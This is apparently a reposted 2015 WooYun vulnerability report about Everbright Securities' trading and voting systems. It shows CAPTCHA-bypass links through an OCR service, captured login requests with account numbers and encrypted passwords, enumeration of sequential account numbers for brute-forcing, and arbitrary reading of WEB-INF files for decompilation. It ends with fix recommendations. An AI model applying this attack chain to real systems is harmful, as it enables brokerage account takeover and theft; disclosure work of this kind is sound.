记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

光大证券交易系统资金账号可被穷举攻击

2015-03-03 18:30

#1 网络投票系统可用交易系统的资金账号登陆

https://116.236.247.174/vote/views/login.html?r=0.6828486339654773

1.png



sc1.png



验证码太过简单,可被100%识别

二值化,阈值100,反色,OCR立马识别

soft1.jpg



https://116.236.247.174/servlet/Image

Image.jpeg



code 区域
http://www.80vul.com/yzm/v.php?url=http://hackdig-h.stor.sinaapp.com/pictures/month_1503/201503031830441843.jpeg



8267.jpg



e.ebscn.com 连在线交易系统也直接被识别

login.png



code 区域
http://www.80vul.com/yzm/v.php?url=https://e.ebscn.com/servlet/Image

ebscn_online.jpg



#2 有密码控件,通过从客户端模拟插件提交,就能自动化攻击了(按键精灵),更重要的是后面的文件泄露漏洞,导致整个服务端算法泄露

在线交易系统的登录过程

code 区域
POST /servlet/json HTTP/1.1

Host: e.ebscn.com

Content-Length: 401

Accept: application/json, text/javascript, */*; q=0.01

Origin: https://e.ebscn.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: https://e.ebscn.com/fortune/views/login/login.html?pageCode=c9uqlQ6BD4s+5tn1CfS2ofvHHmtKwYn5OXD/fMt+2ILmROaEyaeL/dpqgC+b7G8NHFpGo7aib7U=

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

Cookie: CNZZDATA1253545433=1426607054-1421495858-%7C1421495858; JSESSIONID=abcPl8LLMD2KZbN_xW3Ru; user=JqcYG4oOxWE=

Connection: Keep-Alive



funcNo=1001103&fund_account=20431103&trade_pwd=BDE46B39A09835E813E196C2C30E3737B0A63F346A729F2FB99163157901B3B2B5FA249936F999E9C16871C38921182EE89D52028608B00D6ABC2378E77BF78126594BDF4F1D91457686820662D940BD8C2351D79502BC4783C337D6E84C7B83231B0E0C8ADE6A916E5F42295A5DBC7BCEE1D7F3F5C240EFE93DA3A96789A43%257C7cW5peJvDxQ%253D&ticket=gde8&mac=EC-17-2F-77-FF-E2%257C00-50-56-C0-00-01%257C00-50-56-C0-00-08



code 区域
POST /servlet/json HTTP/1.1

Host: 116.236.247.174

Content-Length: 473

Accept: application/json, text/javascript, */*; q=0.01

Origin: https://116.236.247.174

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: https://116.236.247.174/vote/views/login.html?r=0.39641681080684066

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

Cookie: JSESSIONID=abcCqhi9V75DU4i4xUZRu; ip=192.168.198.1|192.168.68.1|192.168.199.120; mac=EC-17-2F-77-FF-E2|00-50-56-C0-00-01|00-50-56-C0-00-08

Connection: Keep-Alive



funcNo=940001&branch_no=&type=pc&account=20431113&password=31AE0E880987FCBC2A2209B77E2DE3C513FC4B50FEDFC1D923550AE0FBC30425FF1D33363195F1B581813502114B88E01E9D80BBFA5C317C389BC1F295EE4E636441030CD56038133A82C6E182A4DA081C53D5335F9E4FB0DC1F6647D7B8DE1C5AC45BE3648D3666EBC72299C0F065583D36112139B2ACFC80ACD9254BB702C1%257CIyv8VycBegk%253D&verify_code=6768&mac=EC-17-2F-77-FF-E2%257C00-50-56-C0-00-01%257C00-50-56-C0-00-08&ip=192.168.198.1%257C192.168.68.1%257C192.168.199.120





#3 资金账号8位有序生成

account=20441102,遍历账号穷举



#4 风险测评,同样验证码可被识别,可以用账号撞密码

code 区域
http://www.80vul.com/yzm/v.php?url=https://cust.ebscn.com/ValidateCode.aspx

6281.jpg



custlogin.jpg

漏洞证明:

#4 任意文件可下载(包括服务端的password解密算法、验证码生成算法等等)

由于光大证券网络投票系统服务端配置不当,导致服务端任意文件可读取

https://116.236.247.174/WEB-INF/web.xml

webxml.jpg



登陆验证接口的servlet,验证码的servlet都在,jd-gui一上,就能反向编译成源码了

code 区域
<servlet-mapping>

<servlet-name>BusService</servlet-name>

<url-pattern>/servlet/json</url-pattern>

</servlet-mapping>

<servlet>

<servlet-name>BusService</servlet-name>

<servlet-class>com.thinkive.tbservice.action.TBClientServlet</servlet-class>

<init-param>



code 区域
<display-name>web</display-name>

<!-- filter definition begin -->

<filter>

<filter-name>CORS</filter-name>

<filter-class>com.thetransactioncompany.cors.CORSFilter</filter-class>

<init-param>

<param-name>cors.allowOrigin</param-name>

<param-value>*</param-value>

</init-param>

<init-param>

<param-name>cors.supportedMethods</param-name>

<param-value>GET, POST, HEAD, PUT, DELETE</param-value>

</init-param>

</filter>

<filter>

<filter-name>Encoding</filter-name>

<filter-class>

com.thinkive.web.common.filter.SetCharacterEncodingFilter

</filter-class>

<init-param>

<param-name>encoding</param-name>

<param-value>UTF-8</param-value>

</init-param>

</filter>

<!-- filter-mapping definition begin -->

<filter-mapping>

<filter-name>CORS</filter-name>

<url-pattern>/*</url-pattern>

</filter-mapping>

<filter-mapping>

<filter-name>Encoding</filter-name>

<url-pattern>*.htm</url-pattern>

</filter-mapping>

<filter-mapping>

<filter-name>Encoding</filter-name>

<url-pattern>*.jsp</url-pattern>

</filter-mapping>

<filter-mapping>

<filter-name>Encoding</filter-name>

<url-pattern>/servlet/*</url-pattern>

</filter-mapping>

<filter-mapping>

<filter-name>Encoding</filter-name>

<url-pattern>/cgi-bin/*</url-pattern>

</filter-mapping>

<!-- filter-mapping definition end -->

<!-- listener definition begin -->

<listener>

<listener-class>

com.thinkive.base.listener.ApplicationLifecycleListener

</listener-class>

</listener>

<!-- listener definition end -->

<!-- servlet definition begin -->

<servlet>

<servlet-name>FastServlet</servlet-name>

<servlet-class>com.thinkive.web.base.FastServlet</servlet-class>

<load-on-startup>0</load-on-startup>

</servlet>

<servlet>

<servlet-name>SSIServlet</servlet-name>

<servlet-class>com.thinkive.web.common.servlet.SSIServlet</servlet-class>

<init-param>

<param-name>encoding</param-name>

<param-value>GBK</param-value>

</init-param>

<load-on-startup>0</load-on-startup>

</servlet>

<servlet>

<servlet-name>fxckhTicketImg</servlet-name>

<servlet-class>com.thinkive.tbservice.action.BuildImageServlet</servlet-class>

</servlet>

<servlet>

<servlet-name>BusService</servlet-name>

<servlet-class>com.thinkive.tbservice.action.TBClientServlet</servlet-class>

<init-param>

<param-name>isSaveResult</param-name>

<param-value>0</param-value>





# 利用jd-gui反逆java class,还原明文代码,甚至可以重构整个网站

WooYun: 去哪儿任意文件读取(基本可重构该系统原工程)

https://116.236.247.174/WEB-INF/classes/com/thinkive/base/listener/ApplicationLifecycleListener.class

jd_ebscn.jpg



在这个国家,提起股票和钱都很敏感,让人神经脆弱,被尝试了很多次的账号,在移动端可以登录,并没有被锁号

login2.jpg

修复方案:

# 加强验证码算法

# 删除泄露文件


知识来源: www.wooyun.org/bugs/wooyun-2015-092415

阅读:706290 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“光大证券交易系统资金账号可被穷举攻击”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

标签云 ☁